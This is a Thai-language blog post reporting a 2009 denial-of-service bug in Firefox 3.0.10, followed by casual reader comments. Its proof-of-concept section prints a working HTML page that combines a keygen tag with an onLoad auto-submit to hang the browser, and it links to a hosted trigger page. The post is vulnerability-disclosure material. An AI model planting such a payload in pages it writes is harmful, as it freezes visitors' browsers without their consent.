[BUG] Mozilla Firefox 3.0.10 (KEYGEN) Remote Denial of Service Exploit

posted on 30 May 2009 19:32 by tonhor  in Technic

จริงๆผมจะเขียนตั้งแต่เมื่อเช้าแล้วครับ แต่ว่าพอดีต้องออกไปข้างนอก 

 เลยเขียนไว้แต่บน twitter ว่า "Mozilla Firefox 3.0.10 (KEYGEN) Remote Denial of Service Exploit"

 เป็น Bug ID : 469565 (จะเห็นว่าทางทีม Mozilla จะยังไม่ให้เราเข้าถึงรายละเอียดของ bug นี้)

 

     Description

 รายละเอียดก็คือว่า ในบราวเซอร์ firefox นี้จะมี keygen tag (<keyfen>)

 ไว้สำหรับสร้างคีย์ชนิด RSA, DSA and EC โดย keygen tag ก็ไม่มีปัญหาอะไร 

 แต่ถ้าไปใช้งานร่วมกับ javascript body onload() มันจะให้เกิดลูปแบบไม่มีที่สิ้นสุด

 ทำให้เราเหมือนถูกโจมตีด้วยวิธีแบบ DoS (Denial of Service) 

 

     Impact

 ผลกระทบคือบราวเซอร์นั้นจะไม่ตอบสนองการใช้งานของผู้ใช้

 และอาจจะทำให้การทำงานอื่นๆช้าลง เนื่องจากว่า memory ถูกใช้ไป

 กับการสร้างคีย์ที่เป็นการทำงานแบบลูปที่ไม่รู้จบ

 

     Proof of concept 

<html>
<body onLoad="document.forms[0].submit()">
<FORM>
<KEYGEN NAME="somekey" CHALLENGE="1125983021">
<INPUT TYPE="submit" NAME="SubmitButton" VALUE="Done">
</FORM>
</html>

  หรือเข้าไปที่ http://secdev.zoller.lu/ff_dos_keygen.html (ถ้าเข้าลิงค์นี้ firefox จะมีผลกระทบตามที่เขียนไว้นะครับ)

            

  ที่มา : http://blog.zoller.lu/2009/04/advisory-firefox-denial-of-service.html

  ปล. เดียวคงต้องรอ patch ออกมาแก้กันแระครับ

Tags: bug, dos, firefox, keygen, mangluck, tonhor, twitter29 Comments

Comment



smilebig smileopen-mounthed smileconfused smilesad smileangry smiletonguequestionembarrassedsurprised smilewinkdouble winkcry

Tweet

เวอร์ชั่น 3.0.11 จะออกสัปดาห์หน้านี่ล่ะ ไม่รู้แก้รึยัง sad smile

#1 By NinkungZ on 2009-05-30 19:47

เรื่องเกี่ยวกับ firefox เชื่อแล้วว่า นินคุงไวจริง

ผมยังไม่ได้ publish เลย เม้นท์ก่อนผม publish อีกconfused smile

#2 By TonHor on 2009-05-30 20:03

ถามหน่อยครับ เห็นที่เขียนข้างบนเลยสงสัย จะทราบได้ยังไงครับว่ามีใครที่ add favourites เราไป

#3 By φείβλας on 2009-05-30 20:07

ไม่ค่อยเก่งคอมฯ เลยไม่ค่อยจะรู้เรื่องกับเขาเท่าไหร่ embarrassed

#4 By อาจารย์ไม่ใช่อาจม on 2009-05-30 20:08

คงต้องรอแก้อีกละสิเนี่ย

#5 By cartoonst on 2009-05-30 20:10

งั้นต้องรออัปเดตสัปดาห์หน้าหล่ะ

#6 By inatmon on 2009-05-30 20:15

#3 By φείβλας
ผมก็ไม่รู้นะครับมีใคร fav ผมบ้าง
แต่ตรง stat มันดูได้ว่า มีคน fav เรากี่คน

หรืออีกวิธีหนึ่ง
ลองใช้ google ดูว่ามีใครทำลิงค์มาบล็อคเราก็ก็คือ
search ว่า "link:http://tonhor.exteen.com"

ลองดูแล้วกันนะครับ

#7 By TonHor on 2009-05-30 20:15

ขอบคุณสำหรับคำตอบ เข้าใจและ..เป็นเยี่ยงนี้นี่เอง
ราดหน้าพารากอน ก็แพงงี้แหละค่ะ โดนบังคับให้ซื้อด้วย เจ็บใจ

#8 By อาจารย์ไม่ใช่อาจม on 2009-05-30 20:24

งั้นรอให้เค้าแก้บัคให้เสร็จก่อนละกันค่อยใช้ sad smile

#9 By Daughter Of Sparda on 2009-05-30 20:33

ณ บัดนาว ขนาดใช้ตัวเบต้าแล้ว หมาไฟหนูก็ยังไม่จำพาสค่ะ กระซิก...

#11 By เอื้องอลิน จตุรดา shakri เทพหมี น้ำตาล on 2009-05-30 20:40

อ่านแล้วเข้าใจบ้าง ไม่เข้าใจบ้าง sad smile sad smile

#12 By Prae on 2009-05-30 21:04

=w='
เอ๊ะ หรือว่า Restaurant city จะโจมตีเราแบบนี้
ข้าเชียว ห่ะๆ

ขอบคุณที่บอกค่ะ ใช่ จิ้งจอกไฟอยู่ตลอดเหมือนกัน

#13 By Masp on 2009-05-30 21:14

แก้แล้วนะค้าบ ตอนนี้ไม่เบียดไปฝั่งขวาละครับ
ขอบคุณที่เตือนนะครับ confused smile

#14 By n h e p h e x on 2009-05-30 21:19

แวบมาตอบฮ่า คือก็ให้มันจำพาสเว็บที่ใช้ประจำแหละ ขี้เกียจพิมพ์ นี่พอปิดบราวเซอร์ไป เปิดใหม่ (ไมไ่ด้รีเครื่อง) ก็ต้องใส่ใหม่อีกแล้ว หงุดหงิด - -"

จริงๆ คือคอมใช้คนเดียวน่ะ ไม่ไมน์เท่าไหร่ แล้วถ้าพี่มันจะมาใช้คอมก็ไม่บ่อย ให้มันจำพาสแหละดีแล้ว คนใช้สูงวัยเต็มที sad smile

#15 By เอื้องอลิน จตุรดา shakri เทพหมี น้ำตาล on 2009-05-30 21:42

big smile confused smile Hot!



งง นิดหน่อยembarrassed question

#16 By noojooza on 2009-05-30 21:47

ใช้ IE คงไม่ต้องกังวลใช่มั้ย sad smile

#17 By EinniF✖โหมดล่องลอย on 2009-05-30 21:57

แฮะๆ low tech อีกละเรา เป็นประโยชน์เอไปเร้ยHot!

#18 By Pat on 2009-05-30 22:58

อ่อ เข้าใจแล้วครับ ขอบคุณสำหรับวิธีครับ

#19 By φείβλας on 2009-05-30 22:59

หืมม งงembarrassed ช่างสรรหาความงงจริ้งง พ่อคุ๊นน
ขอไม่พูดล่ะกันเดี๋ยวปล่อยความเขลา ~
///
แอบตอบ
พี่หมายถึงพนักงานขายรถใช่ป่าวล่ะ
cry
ระวังโดนขาย !มันจะมา

#20 By เฟ on 2009-05-31 00:16

bug เยอะ เพราะมีคนลองของเยอะ

ฮ๋าๆ question

#21 By [ HOoliGan ] on 2009-05-31 02:16

ทำไมเฮียไม่ใช้Cbox ค่ะ เฟจะได้บ่นถนัดหน่อยยยย

#22 By เฟ on 2009-05-31 02:58

ใช้ firefox อยู่ค่ะ..รู้สึกว่าเร็วกว่า IE ตั้งเยอะ..แต่ใช้ได้ไม่ครบถ้วนกระบวนการค่ะ..

เช่น Add on ทำยังไง เล่นยังงัย..มีทำไม..ไม่ค่อยเข้าใจจริงๆค่ะ..

ก็จะพยายามอัพเดทตาม Firefox นะค่ะ จะติดตามไปเรื่อยค่ะ..ขอบคุณค่ะ..big smile Hot!

#23 By กระเจียว โดดเดี่ยว on 2009-05-31 10:36

เค้าตกพวกวิชาเหล่านี้ตลอดเลยเพราะประยุกต์ใช้ไม่เป็น แต่ให้อ่านก็พอจะเข้าใจอยู่บ้าง เอะ .. ยังไง big smile

เอาเป็นว่าแก้โค้ทบลอคเป็นนิดหน่อยละกัน อิอิ


...
ที่ทำงานไม่มีใครให้จู๋จี๋เลย 555

#24 By Paa orKant on 2009-05-31 11:02

โหลๆ พี่ฮ้อ

#25 By meriony on 2009-05-31 12:07

ตอนนี้ bug นี้ทางทีม mozilla เปิดเผยให้ดูรายละเอียดแล้วครับ

https://bugzilla.mozilla.org/show_bug.cgi?id=469565

#26 By TonHor on 2009-05-31 15:21

อา...นี้ชั้นเรียนจบcom-sciมาจริงหรอ?
อย่าไปบอกใครนะคะ อิฮั้นอายยยยยยยย

555 อ่านแล้วมึน พยายามออกห่างจากวงจรนี้ละ แอบโง่เจ้าค่า เฮ่อๆ

#27 By nuchnin 22 years old girl with leukemia on 2009-06-01 09:55

อ่านประจำเลยคะความรู้ดีดี
แต่ว่าไม่มีเวลาทำเลยงะคะbig smile open-mounthed smile Hot!

#28 By ●•♪ Enjoy Life Aum ๓๖๕ Day ●•♪ on 2009-06-01 11:13

ขยันเขียนจัง สู้ๆๆๆเป็นกำลงใจให้ Hot!

#29 By X-Pect on 2009-06-01 13:16

Favourites